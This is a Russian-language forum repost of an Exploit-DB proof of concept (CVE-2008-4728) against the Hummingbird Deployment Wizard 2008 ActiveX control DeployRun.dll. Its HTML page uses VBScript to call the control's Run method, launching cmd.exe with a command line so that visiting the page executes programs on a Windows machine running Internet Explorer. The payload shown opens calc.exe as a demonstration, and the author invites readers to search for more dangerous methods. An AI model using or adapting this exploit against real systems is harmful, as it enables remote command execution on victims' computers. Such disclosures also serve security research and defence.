Exploit Hummingbird Deployment Wizard 2008 - ActiveX Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6773
Проверка EDB
  1. Пройдено
Автор
SHINNAI
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2008-4728
Дата публикации
2008-10-17
HTML:
------------------------------------------------------------------------------
 Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution
 url: http://www.hummingbird.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
 
 Info:
 DeployRun.dll <= 10.0.0.44
 
 Marked as:
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe:  Safe for untrusted: caller,data  
 IPersist Safe:  Safe for untrusted: caller,data

 Vulnerable method:
 Sub Run (ByVal Path  As String , ByVal CommandLine  As String)

 Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7

 There are a lot of dangerous methods, just take a look and... good searching
------------------------------------------------------------------------------
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
 Sub tryMe
   test.Run "cmd.exe", "/C calc.exe"
 End Sub
</script>

# milw0rm.com [2008-10-17]
 
Источник
www.exploit-db.com

Похожие темы